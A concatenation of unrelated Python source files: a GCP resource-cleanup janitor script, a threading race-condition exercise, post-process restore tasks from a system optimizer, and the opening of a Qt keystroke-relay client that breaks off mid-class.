Resource('', 'compute', 'sole-tenancy', 'node-templates', 'region', None, False, True),
Resource('beta', 'compute', 'network-endpoint-groups', None, 'zone', None, False, False),
Resource('', 'compute', 'networks', 'subnets', 'region', None, True, True),
Resource('', 'compute', 'networks', None, '', None, False, True),
Resource('', 'compute', 'routes', None, None, None, False, True),
Resource('', 'compute', 'routers', None, 'region', None, False, True),
# logging resources
Resource('', 'logging', 'sinks', None, None, None, False, False),
]
def log(message):
""" print a message if --verbose is set. """
if ARGS.verbose:
tss = "[" + str(datetime.datetime.now()) + "] "
print tss + message + '\n'
def base_command(resource):
""" Return the base gcloud command with api_version, group and subgroup.
Args:
resource: Definition of a type of gcloud resource.
Returns:
list of base commands of gcloud .
"""
base = ['gcloud']
if resource.api_version:
base += [resource.api_version]
base += [resource.group, '-q', resource.name]
if resource.subgroup:
base.append(resource.subgroup)
return base
def validate_item(item, age, resource, clear_all):
""" Validate if an item need to be cleaned.
Args:
item: a gcloud resource item from json format.
age: Time cutoff from the creation of a resource.
resource: Definition of a type of gcloud resource.
clear_all: If need to clean regardless of timestamp.
Returns:
True if object need to be cleaned, False otherwise.
Raises:
ValueError if json result from gcloud is invalid.
"""
if resource.managed:
if 'isManaged' not in item:
raise ValueError(resource.name, resource.managed)
if resource.managed != item['isManaged']:
return False
# clears everything without checking creationTimestamp
if clear_all:
return True
if 'creationTimestamp' not in item:
raise ValueError('missing key: creationTimestamp - %r' % item)
# Unify datetime to use utc timezone.
created = datetime.datetime.strptime(item['creationTimestamp'], '%Y-%m-%dT%H:%M:%S')
log('Found %r(%r), %r, created time = %r' %
(resource.name, resource.subgroup, item['name'], item['creationTimestamp']))
if created < age:
log('Added to janitor list: %r(%r), %r' %
(resource.name, resource.subgroup, item['name']))
return True
return False
def collect(project, age, resource, filt, clear_all):
""" Collect a list of resources for each condition (zone or region).
Args:
project: The name of a gcp project.
age: Time cutoff from the creation of a resource.
resource: Definition of a type of gcloud resource.
filt: Filter clause for gcloud list command.
clear_all: If need to clean regardless of timestamp.
Returns:
A dict of condition : list of gcloud resource object.
Raises:
ValueError if json result from gcloud is invalid.
subprocess.CalledProcessError if cannot list the gcloud resource
"""
col = collections.defaultdict(list)
# TODO(krzyzacy): logging sink does not have timestamp
# don't even bother listing it if not clear_all
if resource.name == 'sinks' and not clear_all:
return col
cmd = base_command(resource)
cmd.extend([
'list',
'--format=json(name,creationTimestamp.date(tz=UTC),zone,region,isManaged)',
'--filter="%s"' % filt,
'--project=%s' % project])
log('%r' % cmd)
# TODO(krzyzacy): work around for alpha API list calls
try:
items = subprocess.check_output(cmd)
except subprocess.CalledProcessError:
if resource.tolerate:
return col
raise
for item in json.loads(items):
log('parsing item: %r' % item)
if 'name' not in item:
raise ValueError('missing key: name - %r' % item)
if resource.condition and resource.condition in item:
colname = item[resource.condition]
log('looking for items in %s=%s' % (resource.condition, colname))
else:
colname = ''
if validate_item(item, age, resource, clear_all):
col[colname].append(item['name'])
return col
def asyncCall(cmd, tolerate, name, errs, lock, hide_output):
log('Call %r' % cmd)
try:
if hide_output:
FNULL = open(os.devnull, 'w')
subprocess.check_call(cmd, stdout=FNULL)
else:
subprocess.check_call(cmd)
except subprocess.CalledProcessError as exc:
if not tolerate:
with lock:
errs.append(exc)
print >> sys.stderr, 'Error try to delete resources %s: %r' % (name, exc)
def clear_resources(project, cols, resource, rate_limit):
"""Clear a collection of resource, from collect func above.
Args:
project: The name of a gcp project.
cols: A dict of collection of resource.
resource: Definition of a type of gcloud resource.
rate_limit: how many resources to delete per gcloud delete call
Returns:
0 if no error
> 0 if deletion command fails
"""
errs = []
threads = list()
lock = threading.Lock()
# delete one resource at a time, if there's no api support
# aka, logging sinks for example
if not resource.bulk_delete:
rate_limit = 1
for col, items in cols.items():
if ARGS.dryrun:
log('Resource type %r(%r) to be deleted: %r' %
(resource.name, resource.subgroup, list(items)))
continue
manage_key = {'Yes': 'managed', 'No': 'unmanaged'}
# construct the customized gcloud command
base = base_command(resource)
if resource.managed:
base.append(manage_key[resource.managed])
base.append('delete')
base.append('--project=%s' % project)
condition = None
if resource.condition:
if col:
condition = '--%s=%s' % (resource.condition, col)
else:
condition = '--global'
log('going to delete %d %s' % (len(items), resource.name))
# try to delete at most $rate_limit items at a time
for idx in xrange(0, len(items), rate_limit):
clean = items[idx:idx + rate_limit]
cmd = base + list(clean)
if condition:
cmd.append(condition)
thread = threading.Thread(
target=asyncCall, args=(cmd, resource.tolerate, resource.name, errs, lock, False))
threads.append(thread)
log('start a new thread, total %d' % len(threads))
thread.start()
log('Waiting for all %d thread to finish' % len(threads))
for thread in threads:
thread.join()
return len(errs)
def clean_gke_cluster(project, age, filt):
"""Clean up potential leaking gke cluster"""
# a cluster can be created in one of those three endpoints
endpoints = [
'https://test-container.sandbox.googleapis.com/', # test
'https://staging-container.sandbox.googleapis.com/', # staging
'https://container.googleapis.com/', # prod
]
errs = []
for endpoint in endpoints:
threads = list()
lock = threading.Lock()
os.environ['CLOUDSDK_API_ENDPOINT_OVERRIDES_CONTAINER'] = endpoint
log("checking endpoint %s" % endpoint)
cmd = [
'gcloud', 'container', '-q', 'clusters', 'list',
'--project=%s' % project,
'--filter="%s"' % filt,
'--format=json(name,createTime,zone)'
]
log('running %s' % cmd)
output = ''
try:
output = subprocess.check_output(cmd)
except subprocess.CalledProcessError as exc:
# expected error
log('Cannot reach endpoint %s with %r, continue' % (endpoint, exc))
continue
for item in json.loads(output):
log('cluster info: %r' % item)
if 'name' not in item or 'createTime' not in item or 'zone' not in item:
raise ValueError('name, createTime and zone must present: %r' % item)
# The raw createTime string looks like 2017-08-30T18:33:14+00:00
# Which python 2.7 does not support timezones.
# Since age is already in UTC time we'll just strip the timezone part
item['createTime'] = item['createTime'].split('+')[0]
created = datetime.datetime.strptime(
item['createTime'], '%Y-%m-%dT%H:%M:%S')
if created < age:
log('Found stale gke cluster %r in %r, created time = %r' %
(item['name'], endpoint, item['createTime']))
delete = [
'gcloud', 'container', '-q', 'clusters', 'delete',
item['name'],
'--project=%s' % project,
'--zone=%s' % item['zone'],
]
thread = threading.Thread(
target=asyncCall, args=(delete, False, item['name'], errs, lock, True))
threads.append(thread)
log('start a new thread, total %d' % len(threads))
thread.start()
log('Waiting for all %d thread to finish in %s' % (len(threads), endpoint))
for thread in threads:
thread.join()
return len(errs) > 0
def activate_service_account(service_account):
print '[=== Activating service_account %s ===]' % service_account
cmd = [
'gcloud', 'auth', 'activate-service-account',
'--key-file=%s' % service_account,
]
log('running %s' % cmd)
try:
subprocess.check_call(cmd)
except subprocess.CalledProcessError:
print >> sys.stderr, 'Error try to activate service_account: %s' % service_account
return 1
return 0
def main(project, days, hours, filt, rate_limit, service_account):
""" Clean up resources from a gcp project based on it's creation time
Args:
project: The name of a gcp project.
days/hours: days/hours of maximum lifetime of a gcp resource.
filt: Resource instance filters when query.
Returns:
0 if no error
1 if list or delete command fails
"""
print '[=== Start Janitor on project %r ===]' % project
err = 0
age = datetime.datetime.utcnow() - datetime.timedelta(days=days, hours=hours)
clear_all = (days is 0 and hours is 0)
if service_account:
err |= activate_service_account(service_account)
if not err:
for res in DEMOLISH_ORDER:
log('Try to search for %r with condition %r' % (res.name, res.condition))
try:
col = collect(project, age, res, filt, clear_all)
if col:
err |= clear_resources(project, col, res, rate_limit)
except (subprocess.CalledProcessError, ValueError):
err |= 1 # keep clean the other resource
print >> sys.stderr, 'Fail to list resource %r from project %r' \
% (res.name, project)
# try to clean leaking gke cluster
try:
err |= clean_gke_cluster(project, age, filt)
except ValueError:
err |= 1 # keep clean the other resource
print >> sys.stderr, 'Fail to clean up cluster from project %r' % project
print '[=== Finish Janitor on project %r with status %r ===]' % (project, err)
sys.exit(err)
if __name__ == '__main__':
PARSER = argparse.ArgumentParser(
description='Clean up resources from an expired project')
PARSER.add_argument('--project', help='Project to clean', required=True)
PARSER.add_argument(
'--days', type=int,
help='Clean items more than --days old (added to --hours)')
PARSER.add_argument(
'--hours', type=float,
help='Clean items more than --hours old (added to --days)')
PARSER.add_argument(
'--filter',
default='name !~ ^default',
help='Filter down to these instances')
PARSER.add_argument(
'--dryrun',
default=False,
action='store_true',
help='List but not delete resources')
PARSER.add_argument(
'--ratelimit', type=int, default=50,
help='Max number of resources to bulk clear in one gcloud delete call')
PARSER.add_argument(
'--verbose', action='store_true',
help='Get full janitor output log')
PARSER.add_argument(
'--service_account',
help='GCP service account',
default=os.environ.get("GOOGLE_APPLICATION_CREDENTIALS", None))
ARGS = PARSER.parse_args()
# We want to allow --days=0 and --hours=0, so check against None instead.
if ARGS.days is None and ARGS.hours is None:
print >> sys.stderr, 'must specify --days and/or --hours'
sys.exit(1)
main(ARGS.project, ARGS.days or 0, ARGS.hours or 0, ARGS.filter,
ARGS.ratelimit, ARGS.service_account)
|
foo.py | # Python 3.3.3 and 2.7.6
# python fo.py
from threading import Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
def incrementingFunction():
global i
# TODO: increment i 1_000_000 times
for num in range(0, 1000000):
i+=1
def decrementingFunction():
global i
# TODO: decrement i 1_000_000 times
for num in range(0,1000000):
i-=1
def main():
# TODO: Something is missing here (needed to print i)
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
# TODO: Start both threads
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
|
task.py | import asyncio
import re
import traceback
from abc import ABC, abstractmethod
from multiprocessing import Process
from re import Pattern
from typing import List, Optional, Dict, Set, Tuple, Type, Awaitable
from guapow.common import system
from guapow.common.scripts import RunScripts
from guapow.common.users import is_root_user
from guapow.service.optimizer.gpu import GPUState, GPUDriver
from guapow.service.optimizer.post_process.context import PostProcessContext
from guapow.service.optimizer.task.model import OptimizationContext, CPUState
class PostProcessTask(ABC):
@abstractmethod
def __init__(self, context: OptimizationContext):
pass
@abstractmethod
def should_run(self, context: PostProcessContext) -> bool:
pass
@abstractmethod
async def run(self, context: PostProcessContext):
pass
class RestoreGPUState(PostProcessTask):
def __init__(self, context: OptimizationContext):
super(RestoreGPUState, self).__init__(context)
self._gpu_man = context.gpu_man
self._log = context.logger
def should_run(self, context: PostProcessContext) -> bool:
return bool(context.restorable_gpus)
async def _restore(self, driver: GPUDriver, states: List[GPUState], user_env: Optional[dict]):
async with driver.lock():
gpus_states = {} # hold all states mapped to the same GPU
for state in states:
modes = gpus_states.get(state.id, set())
gpus_states[state.id] = modes
modes.add(state.power_mode)
gpus_current_modes = await driver.get_power_mode({*gpus_states.keys()}, user_env)
gpus_to_restore = {}
for id_, modes in gpus_states.items():
# if there is more than one mode mapped to same GPU, a default mode is preferred
mode = [*modes][0] if len(modes) == 1 else driver.get_default_mode()
current_mode = gpus_current_modes.get(id_)
if mode:
if mode != current_mode:
gpus_to_restore[id_] = mode
else:
self._log.info(f"It is not necessary to restore {driver.get_vendor_name()} GPU ({id_}) to "
f"'{mode.name.lower()}' mode")
else:
self._log.error(f"Current mode unknown for {driver.get_vendor_name()} GPU '{id_}'")
if gpus_to_restore:
self._log.debug(f"Restoring power mode of {driver.get_vendor_name()} GPUS: "
f"{', '.join(gpus_to_restore)}")
gpus_changed = await driver.set_power_mode(gpus_to_restore, user_env)
if gpus_changed:
if not self._log.disabled:
not_restored = {gpu for gpu, changed in gpus_changed.items() if not changed}
if not_restored:
self._log.error(f"Could not restore power mode of {driver.get_vendor_name()} GPUS: "
f"{', '.join(gpus_changed)}")
else:
self._log.error(f"Could not restore power mode of {driver.get_vendor_name()} GPUs: "
f"{', '.join(gpus_to_restore.keys())}")
async def run(self, context: PostProcessContext):
restore_tasks = []
for driver in self._gpu_man.get_drivers():
states = context.restorable_gpus.get(driver.__class__)
if states:
restore_tasks.append(self._restore(driver, states, context.user_env))
if restore_tasks:
await asyncio.gather(*restore_tasks)
class RestoreCPUGovernor(PostProcessTask):
def __init__(self, context: OptimizationContext):
self._cpufreq_man = context.cpufreq_man
self._log = context.logger
def should_run(self, context: PostProcessContext) -> bool:
return bool(context.restorable_cpus)
def _map_governors(self, governors: List[Dict[str, Set[int]]]) -> Tuple[Dict[str, Set[int]], Dict[int, Set[str]]]:
governor_cpus, cpu_governors = {}, {}
if governors:
for govs in governors:
if govs: # it is possible that previous governors could not be determined because they were set to 'performance' at that time
for gov, cpus in govs.items():
gov_cpus = governor_cpus.get(gov, set())
gov_cpus.update(cpus)
governor_cpus[gov] = gov_cpus
for cpu in cpus:
govs = cpu_governors.get(cpu, set())
govs.add(gov)
cpu_governors[cpu] = govs
return governor_cpus, cpu_governors
def map_governors(self, cpu_states: List[CPUState]) -> Tuple[Dict[str, Set[int]], Dict[int, Set[str]]]:
governor_cpus, cpu_governors = self._map_governors([state.governors for state in cpu_states])
if not governor_cpus:
governor_cpus, cpu_governors = self._map_governors([self._cpufreq_man.get_saved_governors()])
return governor_cpus, cpu_governors
def _remove_duplicates(self, governor_cpus: Dict[str, Set[int]], cpu_governors: Dict[int, Set[str]]):
"""
if there is a CPU mapped to several governors, remove it from the governors with less CPUs mapped
"""
sorted_governors_cpus = [g for n, g in sorted([(len(c), g) for g, c in governor_cpus.items()], reverse=True)]
to_remove = {} # governor by CPUs to remove
for cpu, governors in cpu_governors.items():
if len(governors) > 1:
pref_gov_idx, pref_gov = None, None
for gov in governors:
gov_prio = sorted_governors_cpus.index(gov)
if pref_gov_idx is None or pref_gov_idx > gov_prio:
pref_gov_idx = gov_prio
pref_gov = gov
for gov in governors:
if gov != pref_gov:
gov_cpus = to_remove.get(gov, set())
to_remove[gov] = gov_cpus
gov_cpus.add(cpu)
for gov, cpus_to_remove in to_remove.items():
for cpu in cpus_to_remove:
governor_cpus[gov].remove(cpu)
def _cpus_to_str(self, cpus: Set[int]):
return ','.join((str(c)for c in cpus))
async def run(self, context: PostProcessContext):
async with self._cpufreq_man.lock():
governor_cpus, cpu_governors = self.map_governors(context.restorable_cpus)
if governor_cpus:
if len(governor_cpus) == 1:
governor = [*governor_cpus][0]
cpus = governor_cpus[governor]
self._log.debug(f"Restoring CPUs ({self._cpus_to_str(cpus)}) governors to '{governor}'")
await self._cpufreq_man.change_governor(governor, cpus)
else:
self._remove_duplicates(governor_cpus, cpu_governors)
for governor, cpus in governor_cpus.items():
if cpus:
self._log.debug(f"Restoring CPUs ({self._cpus_to_str(cpus)}) governors to '{governor}'")
await self._cpufreq_man.change_governor(governor, cpus)
else:
self._log.warning('Previous CPU governors could be restored because they are unknown')
class PostStopProcesses(PostProcessTask):
def __init__(self, context: OptimizationContext):
self._log = context.logger
def should_run(self, context: PostProcessContext) -> bool:
return bool(context.pids_to_stop)
async def run(self, context: PostProcessContext):
self._log.debug("Finding children of related processes")
children = await system.find_children({*context.pids_to_stop})
if children:
self._log.debug(f"Children of related processes found: {' '.join([str(p) for p in children])}")
else:
children = []
self._log.debug("No children of related processes found")
all_to_stop = ' '.join((str(p)for p in (*children, *context.pids_to_stop)))
self._log.info(f'Stopping related processes: {all_to_stop}')
code, _ = await system.async_syscall(f'kill -9 {all_to_stop}', return_output=False)
if code != 0:
self._log.error(f'Not all related processes could be stopped: {all_to_stop}')
class ReEnableWindowCompositor(PostProcessTask):
def __init__(self, context: OptimizationContext):
self._log = context.logger
self._context = context
def should_run(self, context: PostProcessContext) -> bool:
return bool(context.restore_compositor and self._context.compositor and self._context.compositor_disabled_context is not None)
async def run(self, context: PostProcessContext):
compositor, compositor_context = self._context.compositor, self._context.compositor_disabled_context
async with compositor.lock():
enabled = await compositor.is_enabled(user_id=context.user_id, user_env=context.user_env, context=compositor_context)
if enabled is None:
self._log.error("Could not re-enable the window compositor. It was not possible to determine its current state")
return
elif enabled:
self._log.info("It was not necessary to enable the window compositor. It is already enabled.")
self._context.compositor_disabled_context = None # resetting the global context
else:
if await compositor.enable(user_id=context.user_id, user_env=context.user_env, context=compositor_context):
self._log.info("Window compositor re-enabled")
self._context.compositor_disabled_context = None # resetting the global context
else:
self._log.error("Could not re-enable the window compositor")
class RunFinishScripts(PostProcessTask):
def __init__(self, context: OptimizationContext):
self._context = context
self._log = context.logger
self._task = RunScripts('finish', context.allow_root_scripts, self._log)
def should_run(self, context: PostProcessContext) -> bool:
if context.scripts:
for settings in context.scripts:
if settings.scripts:
return True
return False
async def run(self, context: PostProcessContext):
await self._task.run(scripts=context.scripts, user_id=context.user_id, user_env=context.user_env)
class RelaunchStoppedProcesses(PostProcessTask):
def __init__(self, context: OptimizationContext):
self._context = context
self._log = context.logger
self._re_python_cmd: Optional[Pattern] = None
def get_python_cmd_pattern(self) -> Pattern:
if self._re_python_cmd is None:
self._re_python_cmd = re.compile(r'^/.+/python\d*\s+(/.+)$')
return self._re_python_cmd
def should_run(self, context: PostProcessContext) -> bool:
return bool(context.stopped_processes and context.user_id is not None)
async def _run_command(self, name: str, cmd: str):
try:
await system.async_syscall(cmd, return_output=False, wait=False)
self._log.info(f"Process '{name}' ({cmd}) relaunched")
except:
stack_log = traceback.format_exc().replace('\n', ' ')
self._log.warning(f"An exception happened when relaunching process '{name}' ({cmd}): {stack_log}")
def _run_user_command(self, name: str, cmd: str, user_id: int, user_env: Optional[Dict[str, str]] = None):
try:
Process(daemon=True, target=system.run_user_command, kwargs={'cmd': cmd, 'user_id': user_id, 'env': user_env, 'wait': False}).start()
self._log.info(f"Process '{name}' ({cmd}) relaunched (user={user_id})")
except:
stack_log = traceback.format_exc().replace('\n', ' ')
self._log.warning(f"An exception happened when relaunching process '{name}' ({cmd}) [user={user_id}]: {stack_log}")
async def run(self, context: PostProcessContext):
self_is_root = is_root_user()
root_request = is_root_user(context.user_id)
if not self_is_root and root_request:
self._log.warning(f"It will not be possible to launch the following root processes: {', '.join((c[0] for c in context.stopped_processes))}")
return
running_cmds = await system.find_processes_by_command({p[1] for p in context.stopped_processes})
for comm_cmd in context.stopped_processes:
name, cmd = comm_cmd[0], comm_cmd[1]
if running_cmds and cmd in running_cmds:
self._log.warning(f"Process '{name}' ({cmd}) is alive. Skipping its relaunching.")
continue
python_cmd = self.get_python_cmd_pattern().findall(cmd)
real_cmd = python_cmd[0] if python_cmd else cmd
if self_is_root:
if root_request:
await self._run_command(name, real_cmd)
else:
self._run_user_command(name, real_cmd, context.user_id, context.user_env)
else:
await self._run_command(name, real_cmd)
class RestoreMouseCursor(PostProcessTask):
def __init__(self, context: OptimizationContext):
self._log = context.logger
self._mouse_man = context.mouse_man
def should_run(self, context: PostProcessContext) -> bool:
return bool(context.restore_mouse_cursor)
async def run(self, context: PostProcessContext):
await self._mouse_man.show_cursor()
class RestoreCPUEnergyPolicyLevel(PostProcessTask):
def __init__(self, context: OptimizationContext):
self._log = context.logger
self._man = context.cpuenergy_man
def should_run(self, context: PostProcessContext):
return context.restore_cpu_energy_policy
async def run(self, context: PostProcessContext):
async with self._man.lock():
saved_state = self._man.saved_state
if not saved_state:
self._log.info("No CPU energy policy level saved state to restore")
return
self._log.info(f"Restoring CPUs energy policy levels: "
f"{', '.join(f'{idx}={state}' for idx, state in sorted(saved_state.items()))}")
cpus_changed = await self._man.change_states(saved_state)
if not cpus_changed:
self._log.error("Could not restore CPUs energy policy levels")
return
restored, not_restored = [], []
for idx, changed in cpus_changed.items():
if changed:
restored.append(idx)
else:
not_restored.append(str(idx))
if not_restored:
self._log.warning(f"Could not restore the energy policy levels of the following CPUs: "
f"{', '.join(sorted(not_restored))}")
if restored:
self._man.clear_state(*restored)
self._log.debug(f"Saved CPUs energy policy levels cleared: "
f"{', '.join(str(i) for i in sorted(restored))}")
class PostProcessTaskManager:
__ORDER: Dict[Type[PostProcessTask], int] = {ReEnableWindowCompositor: 0,
PostStopProcesses: 1,
RestoreMouseCursor: 2,
RestoreGPUState: 3,
RestoreCPUGovernor: 4,
RestoreCPUEnergyPolicyLevel: 5,
RelaunchStoppedProcesses: 6,
RunFinishScripts: 7}
def __init__(self, context: OptimizationContext, tasks: Optional[List[PostProcessTask]] = None):
self._tasks = tasks if tasks else [cls(context) for cls in PostProcessTask.__subclasses__() if cls != self.__class__]
self._tasks.sort(key=self._sort)
def _sort(self, task: PostProcessTask) -> int:
return self.__ORDER.get(task.__class__, 100)
def get_available_tasks(self):
return [*self._tasks]
def create_tasks(self, context: PostProcessContext) -> Optional[List[Awaitable]]:
if self._tasks:
to_run = [t.run(context) for t in self._tasks if t.should_run(context)]
if to_run:
return to_run
|
relaykeys-qt.py | # -*- coding: utf-8 -*-
import os
from time import sleep, time
from sys import exit, argv
import sys
# util modules
import logging
import argparse
from configparser import ConfigParser
import traceback
from relaykeysclient import RelayKeysClient
import pyWinhook as PyHook3
from PyQt5.QtCore import pyqtSignal, Qt, pyqtSlot, QObject, QThread, QUrl
from PyQt5.QtGui import QIcon, QDesktopServices
from PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QWidget, QApplication, QSystemTrayIcon, \
QMessageBox, QLabel, QAction, QMenu, QMenuBar, QDialog, QPushButton, QMainWindow
from struct import pack, unpack
import win32api
import win32con
import pythoncom
from threading import Timer, Thread
from queue import Queue, Empty as EmptyQueue
parser = argparse.ArgumentParser(description='Relay Keys qt client.')
parser.add_argument('--debug', dest='debug', action='store_const',
const=True, default=False,
help='set logger to debug level')
parser.add_argument('--config', '-c', dest='config',
default=None, help='Path to config file')
parser.add_argument('--url', '-u', dest='url', default=None,
help='rpc http url, default: http://localhost:5383/')
devList = []
modifiers_map = dict([
(162, "LCTRL"),
(163, "RCTRL"),
(160, "LSHIFT"),
(161, "RSHIFT"),
(165, "RALT"),
(164, "LALT"),
(0x5B, "LMETA"),
(0x5C, "RMETA"),
])
keysmap = dict([
(65, "A"),
(66, "B"),
(67, "C"),
(68, "D"),
(69, "E"),
(70, "F"),
(71, "G"),
(72, "H"),
(73, "I"),
(74, "J"),
(75, "K"),
(76, "L"),
(77, "M"),
(78, "N"),
(79, "O"),
(80, "P"),
(81, "Q"),
(82, "R"),
(83, "S"),
(84, "T"),
(85, "U"),
(86, "V"),
(87, "W"),
(88, "X"),
(89, "Y"),
(90, "Z"),
(49, "1"),
(50, "2"),
(51, "3"),
(52, "4"),
(53, "5"),
(54, "6"),
(55, "7"),
(56, "8"),
(57, "9"),
(48, "0"),
(190, "PERIOD"),
(188, "COMMA"),
(186, "SEMICOLON"),
(0xBD, "MINUS"), # VK_OEM_MINUS
(187, "EQUALS"),
(191, "SLASH"),
(220, "BACKSLASH"),
(222, "QUOTE"),
(219, "LEFTBRACKET"),
(221, "RIGHTBRACKET"),
(13, "ENTER"),
(32, "SPACE"),
(8, "BACKSPACE"),
(9, "TAB"),
(445, "UNDERSCORE"),
(33, "PAGEUP"),
(34, "PAGEDOWN"),
(37, "LEFTARROW"),
(39, "RIGHTARROW"),
(38, "UPARROW"),
(40, "DOWNARROW"),
(27, "ESCAPE"),
(36, "HOME"),
(35, "END"),
(45, "INSERT"),
(46, "DELETE"),
(93, "APP"), # Applications key
(20, "CAPSLOCK"),
(112, "F1"),
(113, "F2"),
(114, "F3"),
(115, "F4"),
(116, "F5"),
(117, "F6"),
(118, "F7"),
(119, "F8"),
(120, "F9"),
(121, "F10"),
(122, "F11"),
(123, "F12"),
(0xC0, "BACKQUOTE"), # Keyboard Non-US # and ~
(0x2C, "PRINTSCREEN"), # Keyboard PrintScreen, VK_SNAPSHOT
(0x2B, "EXECUTE"), # VK_EXECUTE
(0x2F, "HELP"), # VK_HELP
(0x12, "MENU"), # VK_MENU
(0x13, "PAUSE"), # VK_PAUSE
(0x29, "SELECT"), # VK_SELECT
(0xB2, "STOP"), # VK_MEDIA_STOP, Keyboard Stop
(0xAD, "MUTE"), # VK_VOLUME_MUTE
(0xAF, "VOLUP"), # VK_VOLUME_UP, Keyboard Volume Up
(0xAE, "VOLDOWN"), # VK_VOLUME_DOWN, Keyboard Volume Down
(0x03, "CANCEL"), # VK_CANCEL
(0x0C, "CLEAR"), # VK_CLEAR, Keyboard Clear
(0x21, "PRIOR"), # VK_PRIOR, Keyboard Prior
(0x0D, "ENTER"), # VK_RETURN, ENTER
(0x6C, "SEPARATOR"), # VK_SEPARATOR
(0x5F, "POWER"), # VK_SLEEP
(0x60, "KP_0"), # VK_NUMPAD0
(0x61, "KP_1"), # VK_NUMPAD1
(0x62, "KP_2"), # VK_NUMPAD2
(0x63, "KP_3"), # VK_NUMPAD3
(0x64, "KP_4"), # VK_NUMPAD4
(0x65, "KP_5"), # VK_NUMPAD5
(0x66, "KP_6"), # VK_NUMPAD6
(0x67, "KP_7"), # VK_NUMPAD7
(0x68, "KP_8"), # VK_NUMPAD8
(0x69, "KP_9"), # VK_NUMPAD9
(0x6E, "KP_PERIOD"), # VK_DECIMAL
(0x6A, "KP_MULTIPLY"), # keypad multiply, VK_MULTIPLY
(0x6F, "KP_DIVIDE"), # keypad divide, VK_DIVIDE
(0x6B, "KP_PLUS"),
(0x6D, "KP_MINUS"),
(0x03, "CANCEL"), # VK_CANCEL
])
char_keysmap = dict([
(65, ("a", "A")),
(66, ("b", "B")),
(67, ("c", "C")),
(68, ("d", "D")),
(69, ("e", "E")),
(70, ("f", "F")),
(71, ("g", "G")),
(72, ("h", "H")),
(73, ("i", "I")),
(74, ("j", "J")),
(75, ("k", "K")),
(76, ("l", "L")),
(77, ("m", "M")),
(78, ("n", "N")),
(79, ("o", "O")),
(80, ("p", "P")),
(81, ("q", "Q")),
(82, ("r", "R")),
(83, ("s", "S")),
(84, ("t", "T")),
(85, ("u", "U")),
(86, ("v", "V")),
(87, ("w", "W")),
(88, ("x", "X")),
(89, ("y", "Y")),
(90, ("z", "Z")),
(49, "1"),
(50, "2"),
(51, "3"),
(52, "4"),
(53, "5"),
(54, "6"),
(55, "7"),
(56, "8"),
(57, "9"),
(48, "0"),
(190, "."),
(188, ","),
(186, ";"),
(0xBD, "-"), # VK_OEM_MINUS
(187, "="),
(191, "/"),
(220, "\\"),
(222, "'"),
(219, ("[", "{")),
(221, ("]", "}")),
(13, ""), # "ENTER"
(32, ""), # "SPACE"
(8, ""), # "BACKSPACE"
(9, ""), # "TAB"
(445, "_"), # "UNDERSCORE"
(0xC0, "~"), # Keyboard Non-US # and ~
(0x0D, ""), # VK_RETURN, ENTER
])
class KeyboardStatusWidget (QWidget):
updateStatusSignal = pyqtSignal(list, list, list)
def __init__(self):
super(KeyboardStatusWidget, self).__init__()
self.updateStatusSignal.connect(self.onUpdateStatus)
self.hlayout = QHBoxLayout()
self.hlayout.setAlignment(Qt.AlignLeft)
self.items = []
self.hlayout.setContentsMargins(0, 0, 0, 0)
self.setLayout(self.hlayout)
def addPlusLabel(self):
label = QLabel()
label.setContentsMargins(5, 5, 5, 5)
label.setAlignment(Qt.AlignVCenter)
fontsize = 10
label.setText("<font size='{fontsize}'>+</font>"
.format(fontsize=fontsize))
item = QVBoxLayout()
item.addWidget(label)
self.items.append(item)
self.hlayout.addLayout(item)
def onUpdateStatus(self, keys, modifiers, unknown_keys):
def layout_del_inner(layout):
for i in reversed(range(layout.count())):
layout.itemAt(i).widget().setParent(None)
for item in self.items:
self.hlayout.removeItem(item)
layout_del_inner(item)
self.items = []
for i in range(len(keys)):
key = keys[i]
label = QLabel()
label.setContentsMargins(5, 5, 5, 5)
label.setAlignment(Qt.AlignVCenter)
fontsize = 10
label.setText("<font style='font-weight:bold;' size='{fontsize}'>{text}</font>"
.format(text=key, fontsize=fontsize))
item = QVBoxLayout()
item.addWidget(label)
self.items.append(item)
self.hlayout.addLayout(item)
if i + 1 != len(keys) or len(modifiers) > 0:
self.addPlusLabel()
for i in range(len(modifiers)):
mod = modifiers[i]
label = QLabel()
label.setContentsMargins(5, 5, 5, 5)
label.setAlignment(Qt.AlignVCenter)
fontsize = 10
label.setText("<font style='font-weight:bold;' size='{fontsize}'>{text}</font>"
.format(text=mod, fontsize=fontsize))
item = QVBoxLayout()
item.addWidget(label)
self.items.append(item)
self.hlayout.addLayout(item)
if i + 1 != len(modifiers) or len(unknown_keys) > 0:
self.addPlusLabel()
for i in range(len(unknown_keys)):
key = unknown_keys[i]
label = QLabel()
label.setContentsMargins(5, 5, 5, 5)
label.setAlignment(Qt.AlignVCenter)
fontsize = 10
label.setText("<font style='font-weight:bold;color:darkred;' size='{fontsize}'>{text}</font>"
.format(text="??(0x{:02x})".format(key), fontsize=fontsize))
item = QVBoxLayout()
item.addWidget(label)
self.items.append(item)
self.hlayout.addLayout(item)
if i + 1 != len(unknown_keys):
self.addPlusLabel()
class Window (QMainWindow):
showErrorMessageSignal = pyqtSignal(str)
def __init__(self, args, config):
self.devList = []
super(Window, self).__init__()
clientconfig = config["client"]
self.showErrorMessageSignal.connect(self.showErrorMessage)
self._keyboard_disabled = False
self._mouse_disabled = True
self._keystate_update_timer = None
self._keys = []
self._modifiers = []
self._unknown_keys = []
self._keyboard_toggle_key = clientconfig.get("keyboard_togglekey", "A")
self._keyboard_toggle_modifiers = clientconfig.get(
"keyboard_togglemods", "LALT").split(",")
self._mouse_toggle_key = clientconfig.get("mouse_togglekey", "S")
self._mouse_toggle_modifiers = clientconfig.get(
"mouse_togglemods", "LALT").split(",")
self._last_mouse_pos = None
self._curBleDeviceName = '---'
url = clientconfig.get("url", None) if args.url == None else args.url
host = clientconfig.get("host", None)
port = clientconfig.get("port", None)
if url is None and not (host is None and port is None):
self.client = RelayKeysClient(host=host, port=port,
username=clientconfig.get(
"username", None),
password=clientconfig.get("password", None))
else:
if url is None:
url = "http://localhost:5383/"
self.client = RelayKeysClient(url=url)
self._client_queue = Queue(64)
t = Thread(target=self.client_worker, args=(self._client_queue,))
t.start()
self.initHooks()
# self.createTrayIcon()
# icon = QIcon(':/.ico')
# self.trayIcon.setIcon(icon)
